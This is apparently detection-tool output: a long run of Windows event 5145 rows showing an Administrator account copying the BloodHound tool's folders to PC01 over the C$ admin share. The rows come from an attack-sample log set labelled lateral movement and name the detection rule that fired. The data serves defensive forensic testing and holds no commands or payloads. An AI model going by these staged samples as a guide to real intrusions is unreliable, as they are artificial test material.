+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
